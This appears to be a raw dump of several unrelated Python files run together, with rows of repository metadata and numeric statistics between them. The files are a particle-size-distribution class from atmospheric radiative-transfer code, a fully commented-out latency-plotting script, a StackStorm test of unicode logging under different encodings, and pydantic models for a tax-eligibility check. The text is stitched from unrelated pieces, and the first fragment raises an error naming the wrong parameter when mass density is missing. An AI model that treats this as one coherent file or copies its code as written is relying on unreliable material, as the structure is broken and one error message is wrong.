return ["mass_density", "intercept_parameter"]
@property
def moments(self):
return [self.mass_density, self.intercept_parameter]
@property
def pnd_call_agenda(self):
@arts_agenda
def pnd_call(ws):
ws.psdDelanoeEtAl14(n0Star = np.nan,
Dm = -999.0,
iwc = np.nan,
rho = self.rho,
alpha = self.alpha,
beta = self.beta,
t_min = self.t_min,
dm_min = self.dm_min,
t_max = self.t_max)
return pnd_call
def _get_parameters(self):
md = self.mass_density
if md is None:
raise Exception("The 'intercept_parameter' data needs to be set to "
" use this function.")
shape = md.shape
n0 = self.intercept_parameter
if n0 is None:
raise Exception("The 'intercept_parameter' data needs to be set to "
" use this function.")
dm = (4.0 ** 4 / np.pi / self.rho * md / n0) ** 0.25
try:
alpha = np.broadcast_to(self.alpha, shape)
except:
raise Exception("Could not broadcast the data for the 'alpha' "
" parameter into the shape the mass density data.")
try:
beta = np.broadcast_to(self.beta, shape)
except:
raise Exception("Could not broadcast the data for the 'beta' "
" parameter into the shape the mass density data.")
return n0, dm, alpha, beta
def get_mass_density(self):
"""
Returns:
Array containing the mass density for all the bulk volumes described
by this PSD.
"""
return self.mass_density
def evaluate(self, x):
"""
Compute value of the particle size distribution for given values of the
size parameter.
Parameters:
x(numpy.array): Array containing the values of :math:`D_eq` at which to
compute the number density.
Returns:
Array :code:`dNdD_eq` containing the computed values of the PSD. The first
dimensions of :code:`dNdD_eq` correspond to the shape of the :code:`n0`
parameter and the last dimension to the size parameter.
"""
n0, dm, alpha, beta = self._get_parameters()
y = evaluate_d14(x, n0, dm, alpha, beta)
return PSDData(x, y, D_eq(self.rho))
| 33.7023
| 91
| 0.549466
| 3,148
| 24,906
| 4.240152
| 0.084498
| 0.021352
| 0.041954
| 0.021576
| 0.818999
| 0.789407
| 0.752847
| 0.720183
| 0.7043
| 0.679128
| 0
| 0.019621
| 0.349273
| 24,906
| 738
| 92
| 33.747967
| 0.803974
| 0.359793
| 0
| 0.780415
| 0
| 0
| 0.1314
| 0.019052
| 0
| 0
| 0
| 0
| 0
| 1
| 0.091988
| false
| 0
| 0.029674
| 0.014837
| 0.20178
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2b5b783edfb8df36ae13d08b9b9f6366017869fa
| 14,358
|
py
|
Python
|
validation/smartnics/tests/graph.py
|
nerds-ufes/G-PolKA
|
9c6bd42167bc333f6421a751c93a88c00841def9
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
validation/smartnics/tests/graph.py
|
nerds-ufes/G-PolKA
|
9c6bd42167bc333f6421a751c93a88c00841def9
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
validation/smartnics/tests/graph.py
|
nerds-ufes/G-PolKA
|
9c6bd42167bc333f6421a751c93a88c00841def9
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
from plotter import Plotter
#####################################################
# Main #
#####################################################
if __name__ == '__main__':
######################################################################################################################
#test_folder= 'data/latency-comparison'
#ymin = 8
#ymax = 15
#Plotter.latency_avg_2methods(folder1=test_folder + '/polka-tstmp/results/',
#folder2=test_folder + '/base-polka-tstmp/results/',
#scenarios=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#labels=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#legends = ['(1)PolKA', '(2)Baseline'],
#finallegends = ['PolKA', 'Baseline'],
#color1 = 'blue',
#color2 = 'lightblue',
#title='Forwarding latency for one single hop (Small Packet - Low Throughput)',
#output='plot/smartnics_latency_smallpacket_basepolka.eps',
#ymin=ymin,
#ymax=ymax,
#fullwidth=False)
#test_folder= 'data/latency-comparison'
#ymin = 8
#ymax = 15
#Plotter.latency_avg_2methods(folder1=test_folder + '/sourcey-tstmp/results/',
#folder2=test_folder + '/base-sourcey-tstmp/results/',
#scenarios=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#labels=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#legends = ['(1)Sourcey', '(2)Baseline'],
#finallegends = ['Sourcey', 'Baseline'],
#color1 = 'red',
#color2 = 'lightpink',
#title='Forwarding latency for one single hop (Small Packet - Low Throughput)',
#output='plot/smartnics_latency_smallpacket_basesourcey.eps',
#ymin=ymin,
#ymax=ymax,
#fullwidth=False)
#test_folder= 'data/latency-comparison'
#ymin = 8
#ymax = 15
#Plotter.latency_avg_2methods(folder1=test_folder + '/sourcey-tstmp/results/',
#folder2=test_folder + '/polka-tstmp/results/',
#scenarios=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#labels=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#legends = ['(1)Sourcey', '(2)PolKA'],
#finallegends = ['Sourcey', 'PolKA'],
#color1 = 'red',
#color2 = 'blue',
#title='Forwarding latency for one single hop (Small Packet - Low Throughput)',
#output='plot/smartnics_latency_smallpacket.eps',
#ymin=ymin,
#ymax=ymax,
#fullwidth=False)
#test_folder= 'data/latency-comparison'
#ymin = 8
#ymax = 15
#Plotter.latency_avg_4methods_all(folder1=test_folder + '/sourcey-tstmp/results/',
#folder2=test_folder + '/base-sourcey-tstmp/results/',
#folder3=test_folder + '/polka-tstmp/results/',
#folder4=test_folder + '/base-polka-tstmp/results/',
#scenarios=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#labels=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#legends = ['(1)Sourcey', '(2)Sourcey Baseline', '(3)PolKA', '(4)PolKA Baseline'],
#finallegends = ['Sourcey', 'Sourcey Baseline', 'PolKA', 'PolKA Baseline'],
#color1 = 'red',
#color2 = 'lightpink',
#color3 = 'blue',
#color4 = 'lightblue',
#title='Forwarding latency for one single hop (Small Packet - Low Throughput)',
#output='plot/smartnics_latency_smallpacket_all.eps',
#ymin=ymin,
#ymax=ymax,
#fullwidth=False)
######################################################################################################################
#test_folder= 'data/latency-comparison-bigpacket'
#ymin = 8
#ymax = 15
#Plotter.latency_avg_2methods(folder1=test_folder + '/polka-tstmp/results/',
#folder2=test_folder + '/base-polka-tstmp/results/',
#scenarios=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#labels=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#legends = ['(1)PolKA', '(2)Baseline'],
#finallegends = ['PolKA', 'Baseline'],
#color1 = 'blue',
#color2 = 'lightblue',
#title='Forwarding latency for one single hop (Big Packet - Low Throughput)',
#output='plot/smartnics_latency_bigpacket_basepolka.eps',
#ymin=ymin,
#ymax=ymax,
#fullwidth=False)
#test_folder= 'data/latency-comparison-bigpacket'
#ymin = 8
#ymax = 15
#Plotter.latency_avg_2methods(folder1=test_folder + '/sourcey-tstmp/results/',
#folder2=test_folder + '/base-sourcey-tstmp/results/',
#scenarios=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#labels=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#legends = ['(1)Sourcey', '(2)Baseline'],
#finallegends = ['Sourcey', 'Baseline'],
#color1 = 'red',
#color2 = 'lightpink',
#title='Forwarding latency for one single hop (Big Packet - Low Throughput)',
#output='plot/smartnics_latency_bigpacket_basesourcey.eps',
#ymin=ymin,
#ymax=ymax,
#fullwidth=False)
#test_folder= 'data/latency-comparison-bigpacket'
#ymin = 8
#ymax = 15
#Plotter.latency_avg_2methods(folder1=test_folder + '/sourcey-tstmp/results/',
#folder2=test_folder + '/polka-tstmp/results/',
#scenarios=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#labels=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#legends = ['(1)Sourcey', '(2)PolKA'],
#finallegends = ['Sourcey', 'PolKA'],
#color1 = 'red',
#color2 = 'blue',
#title='Forwarding latency for one single hop (Big Packet - Low Throughput)',
#output='plot/smartnics_latency_bigpacket.eps',
#ymin=ymin,
#ymax=ymax,
#fullwidth=False)
#test_folder= 'data/latency-comparison-bigpacket'
#ymin = 8
#ymax = 15
#Plotter.latency_avg_4methods_all(folder1=test_folder + '/sourcey-tstmp/results/',
#folder2=test_folder + '/base-sourcey-tstmp/results/',
#folder3=test_folder + '/polka-tstmp/results/',
#folder4=test_folder + '/base-polka-tstmp/results/',
#scenarios=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#labels=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#legends = ['(1)Sourcey', '(2)Sourcey Baseline', '(3)PolKA', '(4)PolKA Baseline'],
#finallegends = ['Sourcey', 'Sourcey Baseline', 'PolKA', 'PolKA Baseline'],
#color1 = 'red',
#color2 = 'lightpink',
#color3 = 'blue',
#color4 = 'lightblue',
#title='Forwarding latency for one single hop (Big Packet - Low Throughput)',
#output='plot/smartnics_latency_bigpacket_all.eps',
#ymin=ymin,
#ymax=ymax,
#fullwidth=False)
######################################################################################################################
#test_folder= 'data/udp-latency-comparison'
#ymin = 8
#ymax = 15
#Plotter.latency_avg_2methods(folder1=test_folder + '/polka-tstmp/results/',
#folder2=test_folder + '/base-polka-tstmp/results/',
#scenarios=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#labels=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#legends = ['(1)PolKA', '(2)Baseline'],
#finallegends = ['PolKA', 'Baseline'],
#color1 = 'blue',
#color2 = 'lightblue',
#title='Forwarding latency for one single hop (Small Packet - High Throughput)',
#output='plot/smartnics_udp_latency_smallpacket_basepolka.eps',
#ymin=ymin,
#ymax=ymax,
#fullwidth=False)
#test_folder= 'data/udp-latency-comparison'
#ymin = 8
#ymax = 15
#Plotter.latency_avg_2methods(folder1=test_folder + '/sourcey-tstmp/results/',
#folder2=test_folder + '/base-sourcey-tstmp/results/',
#scenarios=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#labels=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#legends = ['(1)Sourcey', '(2)Baseline'],
#finallegends = ['Sourcey', 'Baseline'],
#color1 = 'red',
#color2 = 'lightpink',
#title='Forwarding latency for one single hop (Small Packet - High Throughput)',
#output='plot/smartnics_udp_latency_smallpacket_basesourcey.eps',
#ymin=ymin,
#ymax=ymax,
#fullwidth=False)
#test_folder= 'data/udp-latency-comparison'
#ymin = 8
#ymax = 15
#Plotter.latency_avg_2methods(folder1=test_folder + '/sourcey-tstmp/results/',
#folder2=test_folder + '/polka-tstmp/results/',
#scenarios=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#labels=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#legends = ['(1)Sourcey', '(2)PolKA'],
#finallegends = ['Sourcey', 'PolKA'],
#color1 = 'red',
#color2 = 'blue',
#title='Forwarding latency for one single hop (Small Packet - High Throughput)',
#output='plot/smartnics_udp_latency_smallpacket.eps',
#ymin=ymin,
#ymax=ymax,
#fullwidth=False)
#test_folder= 'data/udp-latency-comparison'
#ymin = 8
#ymax = 15
#Plotter.latency_avg_4methods_all(folder1=test_folder + '/sourcey-tstmp/results/',
#folder2=test_folder + '/base-sourcey-tstmp/results/',
#folder3=test_folder + '/polka-tstmp/results/',
#folder4=test_folder + '/base-polka-tstmp/results/',
#scenarios=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#labels=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#legends = ['(1)Sourcey', '(2)Sourcey Baseline', '(3)PolKA', '(4)PolKA Baseline'],
#finallegends = ['Sourcey', 'Sourcey Baseline', 'PolKA', 'PolKA Baseline'],
#color1 = 'red',
#color2 = 'lightpink',
#color3 = 'blue',
#color4 = 'lightblue',
#title='Forwarding latency for one single hop (Small Packet - High Throughput)',
#output='plot/smartnics_udp_latency_smallpacket_all.eps',
#ymin=ymin,
#ymax=ymax,
#fullwidth=False)
######################################################################################################################
#test_folder= 'data/udp-latency-comparison-bigpacket'
#ymin = 8
#ymax = 15
#Plotter.latency_avg_2methods(folder1=test_folder + '/polka-tstmp/results/',
#folder2=test_folder + '/base-polka-tstmp/results/',
#scenarios=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#labels=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#legends = ['(1)PolKA', '(2)Baseline'],
#finallegends = ['PolKA', 'Baseline'],
#color1 = 'blue',
#color2 = 'lightblue',
#title='Forwarding latency for one single hop (Big Packet - High Throughput)',
#output='plot/smartnics_udp_latency_bigpacket_basepolka.eps',
#ymin=ymin,
#ymax=ymax,
#fullwidth=False)
#test_folder= 'data/udp-latency-comparison-bigpacket'
#ymin = 8
#ymax = 15
#Plotter.latency_avg_2methods(folder1=test_folder + '/sourcey-tstmp/results/',
#folder2=test_folder + '/base-sourcey-tstmp/results/',
#scenarios=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#labels=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#legends = ['(1)Sourcey', '(2)Baseline'],
#finallegends = ['Sourcey', 'Baseline'],
#color1 = 'red',
#color2 = 'lightpink',
#title='Forwarding latency for one single hop (Big Packet - High Throughput)',
#output='plot/smartnics_udp_latency_bigpacket_basesourcey.eps',
#ymin=ymin,
#ymax=ymax,
#fullwidth=False)
#test_folder= 'data/udp-latency-comparison-bigpacket'
#ymin = 8
#ymax = 15
#Plotter.latency_avg_2methods(folder1=test_folder + '/sourcey-tstmp/results/',
#folder2=test_folder + '/polka-tstmp/results/',
#scenarios=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#labels=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#legends = ['(1)Sourcey', '(2)PolKA'],
#finallegends = ['Sourcey', 'PolKA'],
#color1 = 'red',
#color2 = 'blue',
#title='Forwarding latency for one single hop (Big Packet - High Throughput)',
#output='plot/smartnics_udp_latency_bigpacket.eps',
#ymin=ymin,
#ymax=ymax,
#fullwidth=False)
#test_folder= 'data/udp-latency-comparison-bigpacket'
#ymin = 8
#ymax = 15
#Plotter.latency_avg_4methods_all(folder1=test_folder + '/sourcey-tstmp/results/',
#folder2=test_folder + '/base-sourcey-tstmp/results/',
#folder3=test_folder + '/polka-tstmp/results/',
#folder4=test_folder + '/base-polka-tstmp/results/',
#scenarios=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#labels=['1', '2', '3', '4', '5', '6', '7', '8', '9'],
#legends = ['(1)Sourcey', '(2)Sourcey Baseline', '(3)PolKA', '(4)PolKA Baseline'],
#finallegends = ['Sourcey', 'Sourcey Baseline', 'PolKA', 'PolKA Baseline'],
#color1 = 'red',
#color2 = 'lightpink',
#color3 = 'blue',
#color4 = 'lightblue',
#title='Forwarding latency for one single hop (Big Packet - High Throughput)',
#output='plot/smartnics_udp_latency_bigpacket_all.eps',
#ymin=ymin,
#ymax=ymax,
#fullwidth=False)
| 46.316129
| 118
| 0.487672
| 1,448
| 14,358
| 4.730663
| 0.049724
| 0.081752
| 0.014015
| 0.018686
| 0.994453
| 0.994453
| 0.994453
| 0.994453
| 0.994453
| 0.994453
| 0
| 0.046116
| 0.287157
| 14,358
| 309
| 119
| 46.466019
| 0.623156
| 0.741747
| 0
| 0
| 0
| 0
| 0.002814
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.5
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
997f96c7a573695e7210fafbb29a989b0d8f7862
| 10,639
|
py
|
Python
|
st2common/tests/integration/test_logging.py
|
muyouming/st2
|
a80fa2b6b0f7ff3281ed8dee8ca6e97910fbd00e
|
[
"Apache-2.0"
] | 4,920
|
2015-01-01T15:12:17.000Z
|
2022-03-31T19:31:15.000Z
|
st2common/tests/integration/test_logging.py
|
muyouming/st2
|
a80fa2b6b0f7ff3281ed8dee8ca6e97910fbd00e
|
[
"Apache-2.0"
] | 3,563
|
2015-01-05T19:02:19.000Z
|
2022-03-31T19:23:09.000Z
|
st2common/tests/integration/test_logging.py
|
muyouming/st2
|
a80fa2b6b0f7ff3281ed8dee8ca6e97910fbd00e
|
[
"Apache-2.0"
] | 774
|
2015-01-01T20:41:24.000Z
|
2022-03-31T13:25:29.000Z
|
# Copyright 2020 The StackStorm Authors.
# Copyright 2019 Extreme Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import os
import sys
import signal
import unittest
import eventlet
from eventlet.green import subprocess
from st2tests.base import IntegrationTestCase
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
TEST_FILE_PATH = os.path.join(BASE_DIR, "log_unicode_data.py")
class LogFormattingAndEncodingTestCase(IntegrationTestCase):
def test_formatting_with_unicode_data_works_no_stdout_patching_valid_utf8_encoding(
self,
):
# Ensure that process doesn't end up in an infinite loop if non-utf8 locale / encoding is
# used and a unicode sequence is logged.
# 1. Process is using a utf-8 encoding
process = self._start_process(
env={
"LC_ALL": "en_US.UTF-8",
"ST2_LOG_PATCH_STDOUT": "false",
"PYTHONIOENCODING": "utf-8",
}
)
self.add_process(process=process)
# Give it some time to start up and run for a while
eventlet.sleep(2)
process.send_signal(signal.SIGKILL)
stdout = process.stdout.read().decode("utf-8").strip()
stderr = process.stderr.read().decode("utf-8").strip()
stdout_lines = stdout.split("\n")
self.assertEqual(stderr, "")
self.assertTrue(len(stdout_lines) < 20)
self.assertIn("INFO [-] Test info message 1", stdout)
self.assertIn("Test debug message 1", stdout)
self.assertIn("INFO [-] Test info message with unicode 1 - 好好好", stdout)
self.assertIn("DEBUG [-] Test debug message with unicode 1 - 好好好", stdout)
self.assertIn(
"INFO [-] Test info message with unicode 1 - \u597d\u597d\u597d", stdout
)
self.assertIn(
"DEBUG [-] Test debug message with unicode 1 - \u597d\u597d\u597d", stdout
)
@unittest.skipIf(sys.version_info >= (3, 8, 0), "Skipping test under Python >= 3.8")
def test_formatting_with_unicode_data_works_no_stdout_patching_non_valid_utf8_encoding(
self,
):
# Ensure that process doesn't end up in an infinite loop if non-utf8 locale / encoding is
# used and a unicode sequence is logged.
# 2. Process is not using utf-8 encoding - LC_ALL set to invalid locale - should result in
# single exception being logged, but not infinite loop
process = self._start_process(
env={
"LC_ALL": "invalid",
"ST2_LOG_PATCH_STDOUT": "false",
"PYTHONIOENCODING": "utf-8",
}
)
self.add_process(process=process)
# Give it some time to start up and run for a while
eventlet.sleep(2)
process.send_signal(signal.SIGKILL)
stdout = process.stdout.read().decode("utf-8")
stderr = process.stderr.read().decode("utf-8")
stdout_lines = stdout.split("\n")
self.assertEqual(stderr, "")
self.assertIn("ERROR [-] ", stdout)
self.assertIn("can't encode", stdout)
self.assertIn("'ascii' codec can't encode", stdout)
self.assertTrue(len(stdout_lines) >= 50)
self.assertTrue(len(stdout_lines) < 100)
self.assertIn("INFO [-] Test info message 1", stdout)
self.assertIn("Test debug message 1", stdout)
self.assertIn("INFO [-] Test info message with unicode 1 - 好好好", stdout)
self.assertIn("DEBUG [-] Test debug message with unicode 1 - 好好好", stdout)
self.assertIn(
"INFO [-] Test info message with unicode 1 - \u597d\u597d\u597d", stdout
)
self.assertIn(
"DEBUG [-] Test debug message with unicode 1 - \u597d\u597d\u597d", stdout
)
def test_formatting_with_unicode_data_works_no_stdout_patching_ascii_pythonioencoding(
self,
):
# Ensure that process doesn't end up in an infinite loop if non-utf8 locale / encoding is
# used and a unicode sequence is logged.
# 3. Process is not using utf-8 encoding - PYTHONIOENCODING set to ascii - should result in
# single exception being logged, but not infinite loop
process = self._start_process(
env={
"LC_ALL": "en_US.UTF-8",
"ST2_LOG_PATCH_STDOUT": "false",
"PYTHONIOENCODING": "ascii",
}
)
self.add_process(process=process)
# Give it some time to start up and run for a while
eventlet.sleep(2)
process.send_signal(signal.SIGKILL)
stdout = process.stdout.read().decode("utf-8")
stderr = process.stderr.read().decode("utf-8")
stdout_lines = stdout.split("\n")
self.assertEqual(stderr, "")
self.assertIn("ERROR [-] ", stdout)
self.assertIn("can't encode", stdout)
self.assertIn("'ascii' codec can't encode", stdout)
self.assertTrue(len(stdout_lines) >= 50)
self.assertTrue(len(stdout_lines) < 100)
self.assertIn("INFO [-] Test info message 1", stdout)
self.assertIn("Test debug message 1", stdout)
self.assertNotIn("INFO [-] Test info message with unicode 1 - 好好好", stdout)
self.assertNotIn("DEBUG [-] Test debug message with unicode 1 - 好好好", stdout)
self.assertNotIn(
"INFO [-] Test info message with unicode 1 - \u597d\u597d\u597d", stdout
)
self.assertNotIn(
"DEBUG [-] Test debug message with unicode 1 - \u597d\u597d\u597d", stdout
)
def test_formatting_with_unicode_data_works_with_stdout_patching_valid_utf8_encoding(
self,
):
# Test a scenario where patching is enabled which means it should never result in infinite
# loop
# 1. Process is using a utf-8 encoding
process = self._start_process(
env={
"LC_ALL": "en_US.UTF-8",
"ST2_LOG_PATCH_STDOUT": "true",
"PYTHONIOENCODING": "utf-8",
}
)
self.add_process(process=process)
# Give it some time to start up and run for a while
eventlet.sleep(2)
process.send_signal(signal.SIGKILL)
stdout = process.stdout.read().decode("utf-8")
stderr = process.stderr.read().decode("utf-8")
stdout_lines = stdout.split("\n")
self.assertEqual(stderr, "")
self.assertTrue(len(stdout_lines) < 20)
self.assertIn("INFO [-] Test info message 1", stdout)
self.assertIn("Test debug message 1", stdout)
self.assertIn("INFO [-] Test info message with unicode 1 - 好好好", stdout)
self.assertIn("DEBUG [-] Test debug message with unicode 1 - 好好好", stdout)
self.assertIn(
"INFO [-] Test info message with unicode 1 - \u597d\u597d\u597d", stdout
)
self.assertIn(
"DEBUG [-] Test debug message with unicode 1 - \u597d\u597d\u597d", stdout
)
def test_formatting_with_unicode_data_works_with_stdout_patching_non_valid_utf8_encoding(
self,
):
# 2. Process is not using utf-8 encoding
process = self._start_process(
env={
"LC_ALL": "invalid",
"ST2_LOG_PATCH_STDOUT": "true",
"PYTHONIOENCODING": "utf-8",
}
)
self.add_process(process=process)
# Give it some time to start up and run for a while
eventlet.sleep(2)
process.send_signal(signal.SIGKILL)
stdout = process.stdout.read().decode("utf-8")
stderr = process.stderr.read().decode("utf-8")
stdout_lines = stdout.split("\n")
self.assertEqual(stderr, "")
print(stdout)
self.assertTrue(len(stdout_lines) < 100)
self.assertIn("INFO [-] Test info message 1", stdout)
self.assertIn("Test debug message 1", stdout)
self.assertIn("INFO [-] Test info message with unicode 1 - 好好好", stdout)
self.assertIn("DEBUG [-] Test debug message with unicode 1 - 好好好", stdout)
self.assertIn(
"INFO [-] Test info message with unicode 1 - \u597d\u597d\u597d", stdout
)
self.assertIn(
"DEBUG [-] Test debug message with unicode 1 - \u597d\u597d\u597d", stdout
)
def test_formatting_with_unicode_data_works_with_stdout_patching__ascii_pythonioencoding(
self,
):
# 3. Process is not using utf-8 encoding - PYTHONIOENCODING set to ascii
process = self._start_process(
env={
"LC_ALL": "en_US.UTF-8",
"ST2_LOG_PATCH_STDOUT": "true",
"PYTHONIOENCODING": "ascii",
}
)
self.add_process(process=process)
# Give it some time to start up and run for a while
eventlet.sleep(2)
process.send_signal(signal.SIGKILL)
stdout = process.stdout.read().decode("utf-8")
stderr = process.stderr.read().decode("utf-8")
stdout_lines = stdout.split("\n")
self.assertEqual(stderr, "")
self.assertTrue(len(stdout_lines) < 20)
self.assertIn("Patching sys.stdout", stdout)
self.assertIn("INFO [-] Test info message 1", stdout)
self.assertIn("Test debug message 1", stdout)
self.assertIn("INFO [-] Test info message with unicode 1 - 好好好", stdout)
self.assertIn("DEBUG [-] Test debug message with unicode 1 - 好好好", stdout)
self.assertIn(
"INFO [-] Test info message with unicode 1 - \u597d\u597d\u597d", stdout
)
self.assertIn(
"DEBUG [-] Test debug message with unicode 1 - \u597d\u597d\u597d", stdout
)
def _start_process(self, env=None):
cmd = [sys.executable, TEST_FILE_PATH]
process = subprocess.Popen(
cmd,
env=env or os.environ.copy(),
cwd=os.getcwd(),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=False,
preexec_fn=os.setsid,
)
return process
| 37.329825
| 99
| 0.614343
| 1,314
| 10,639
| 4.856164
| 0.152207
| 0.073343
| 0.087447
| 0.071462
| 0.820404
| 0.811628
| 0.807397
| 0.797054
| 0.789531
| 0.789531
| 0
| 0.030327
| 0.280947
| 10,639
| 284
| 100
| 37.461268
| 0.803791
| 0.173137
| 0
| 0.70297
| 0
| 0
| 0.254566
| 0
| 0
| 0
| 0
| 0
| 0.282178
| 1
| 0.034653
| false
| 0
| 0.039604
| 0
| 0.084158
| 0.004951
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
999e82b5427e1cbe9686cd38ed5cb95d14afa33c
| 19,232
|
py
|
Python
|
webapp/app/model/eligibility_data.py
|
digitalservice4germany/steuerlotse
|
ef3e094e4d7d4768431a50ac4be60672cd03221d
|
[
"MIT"
] | 20
|
2021-07-02T07:49:08.000Z
|
2022-03-18T22:26:10.000Z
|
webapp/app/model/eligibility_data.py
|
digitalservice4germany/steuerlotse
|
ef3e094e4d7d4768431a50ac4be60672cd03221d
|
[
"MIT"
] | 555
|
2021-06-28T15:35:15.000Z
|
2022-03-31T11:51:55.000Z
|
webapp/app/model/eligibility_data.py
|
digitalservice4germany/steuerlotse
|
ef3e094e4d7d4768431a50ac4be60672cd03221d
|
[
"MIT"
] | 1
|
2021-07-04T20:34:12.000Z
|
2021-07-04T20:34:12.000Z
|
from typing import Optional
from pydantic import BaseModel, validator
from pydantic.fields import ModelField
from app.model.recursive_data import RecursiveDataModel, PotentialDataModelKeysMixin
class InvalidEligiblityError(ValueError):
"""Exception thrown in case the eligibility check failed."""
pass
def declarations_must_be_set_yes(v):
if not v == 'yes':
raise InvalidEligiblityError
return v
def declarations_must_be_set_no(v):
if not v == 'no':
raise InvalidEligiblityError
return v
class MarriedEligibilityData(BaseModel, PotentialDataModelKeysMixin):
marital_status_eligibility: str
@validator('marital_status_eligibility')
def must_be_married(cls, v):
if v not in 'married':
raise ValueError
return v
class WidowedEligibilityData(BaseModel, PotentialDataModelKeysMixin):
marital_status_eligibility: str
@validator('marital_status_eligibility')
def must_be_widowed(cls, v):
if v not in 'widowed':
raise ValueError
return v
class SingleEligibilityData(BaseModel, PotentialDataModelKeysMixin):
marital_status_eligibility: str
@validator('marital_status_eligibility')
def must_be_single(cls, v):
if v not in 'single':
raise ValueError
return v
class DivorcedEligibilityData(BaseModel, PotentialDataModelKeysMixin):
marital_status_eligibility: str
@validator('marital_status_eligibility')
def must_be_divorced(cls, v):
if v not in 'divorced':
raise ValueError
return v
class SeparatedEligibilityData(RecursiveDataModel):
is_married: Optional[MarriedEligibilityData]
separated_since_last_year_eligibility: str
@validator('separated_since_last_year_eligibility')
def separated_couple_must_be_separated_since_last_year(cls, v):
return declarations_must_be_set_yes(v)
@validator('is_married', always=True, check_fields=False)
def one_previous_field_has_to_be_set(cls, v, values):
return super().one_previous_field_has_to_be_set(cls, v, values)
class NotSeparatedEligibilityData(RecursiveDataModel):
is_married: Optional[MarriedEligibilityData]
separated_since_last_year_eligibility: str
@validator('separated_since_last_year_eligibility')
def married_couples_are_not_separated_since_last_year(cls, v):
return declarations_must_be_set_no(v)
@validator('is_married', always=True, check_fields=False)
def one_previous_field_has_to_be_set(cls, v, values):
return super().one_previous_field_has_to_be_set(cls, v, values)
class SeparatedLivedTogetherEligibilityData(RecursiveDataModel):
is_separated: Optional[SeparatedEligibilityData]
separated_lived_together_eligibility: str
@validator('separated_lived_together_eligibility')
def separated_couple_must_have_lived_together(cls, v):
return declarations_must_be_set_yes(v)
@validator('is_separated', always=True, check_fields=False)
def one_previous_field_has_to_be_set(cls, v, values):
return super().one_previous_field_has_to_be_set(cls, v, values)
class SeparatedNotLivedTogetherEligibilityData(RecursiveDataModel):
is_separated: Optional[SeparatedEligibilityData]
separated_lived_together_eligibility: str
@validator('separated_lived_together_eligibility')
def married_couples_must_not_have_lived_together(cls, v):
return declarations_must_be_set_no(v)
@validator('is_separated', always=True, check_fields=False)
def one_previous_field_has_to_be_set(cls, v, values):
return super().one_previous_field_has_to_be_set(cls, v, values)
class SeparatedJointTaxesEligibilityData(RecursiveDataModel):
separated_lived_together: Optional[SeparatedLivedTogetherEligibilityData]
separated_joint_taxes_eligibility: str
@validator('separated_joint_taxes_eligibility')
def separated_couple_must_do_joint_taxes(cls, v):
return declarations_must_be_set_yes(v)
@validator('separated_lived_together', always=True, check_fields=False)
def one_previous_field_has_to_be_set(cls, v, values):
return super().one_previous_field_has_to_be_set(cls, v, values)
class SeparatedNoJointTaxesEligibilityData(RecursiveDataModel):
separated_lived_together: Optional[SeparatedLivedTogetherEligibilityData]
separated_joint_taxes_eligibility: str
@validator('separated_joint_taxes_eligibility')
def married_couples_must_not_do_joint_taxes(cls, v):
return declarations_must_be_set_no(v)
@validator('separated_lived_together', always=True, check_fields=False)
def one_previous_field_has_to_be_set(cls, v, values):
return super().one_previous_field_has_to_be_set(cls, v, values)
